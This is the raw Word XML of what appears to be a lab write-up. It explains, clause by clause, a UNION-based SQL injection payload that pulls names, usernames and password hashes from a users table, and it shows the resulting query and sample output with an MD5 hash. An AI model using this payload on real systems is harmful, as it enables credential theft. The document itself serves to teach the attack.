          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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dummy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>condition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always</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>evaluates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false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>so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rows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 original query are returned, and only rows from the UNION SELECT get displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CCCFE8" w14:textId="77777777" w:rsidR="002D34AF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120"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2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combines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result 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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>query's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>expected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output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5950EB6B" w14:textId="77777777" w:rsidR="002D34AF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163" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="1027" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5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first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>selected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injected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>query.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displays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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> value from each user in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106456B1" w14:textId="77777777" w:rsidR="002D34AF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119" w:line="278" w:lineRule="auto"/>
        <w:ind w:right="544" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'Last:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>User:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pass:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3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Combines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>several fields into a readable single string format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E9093" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A2B8784" wp14:editId="12FA9425">
            <wp:extent cx="84327" cy="84327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327" cy="8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b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'Last: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→ label to identify last name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD5428" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="44" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="705" w:right="4451"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="321203F8" wp14:editId="782F013B">
            <wp:extent cx="84327" cy="84327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327" cy="8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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/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table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E4F20DB" wp14:editId="7CAC451A">
            <wp:extent cx="84327" cy="84327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327" cy="8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4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' | User: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ label to identify username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77E3E496" wp14:editId="7CC54F4A">
            <wp:extent cx="84327" cy="84327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327" cy="8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4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">→ username from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F26D01" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="273" w:lineRule="exact"/>
        <w:ind w:left="705"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387FD361" wp14:editId="1ADCEFB5">
            <wp:extent cx="84327" cy="84327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327" cy="8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b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">' | Pass: ' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→ label to identify password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C9D8C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="45"/>
        <w:ind w:left="703"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28E4A076" wp14:editId="65ECA110">
            <wp:extent cx="84328" cy="84327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328" cy="8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b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>→ password hash of the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844EA10" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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outputs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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human-readable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D4385B" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="164"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>Last:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Brown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User:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gordonb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Pass:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>e99a18c428cb38d5f260853678922e03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46830560" w14:textId="77777777" w:rsidR="002D34AF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164"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-1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Specifies the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we are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>extracting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from,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users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7219B4" w14:textId="77777777" w:rsidR="002D34AF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163"/>
        <w:ind w:left="502" w:hanging="196"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-6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15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Avoids</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>errors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canceling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>out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rest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original</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5350E276" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="208"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610C9B10" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:t>Final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(How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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>executes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA5989E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="2748"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>first_name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last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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id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'' AND 1=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCBD23" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="1221"/>
      </w:pPr>
      <w:r>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>first_name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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'Last:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'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User:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'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Pass:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150DC74" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="271" w:lineRule="exact"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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rPr>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>--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rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ignored</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002D34AF">
      <w:pgSz w:w="11910" w:h="16840"/>
      <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="71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FEFDC" w14:textId="77777777" w:rsidR="00C9238A" w:rsidRDefault="00C9238A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C6E00EA" w14:textId="77777777" w:rsidR="00C9238A" w:rsidRDefault="00C92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9CB81" w14:textId="77777777" w:rsidR="00C9238A" w:rsidRDefault="00C9238A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="185FC2D8" w14:textId="77777777" w:rsidR="00C9238A" w:rsidRDefault="00C923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1185C" w14:textId="5CCF0587" w:rsidR="002D34A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7440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="168E0001" wp14:editId="74F6050E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>3421507</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>442806</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="71882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88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6975C0" w14:textId="0320AE91" w:rsidR="002D34AF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9"/>
                            </w:rPr>
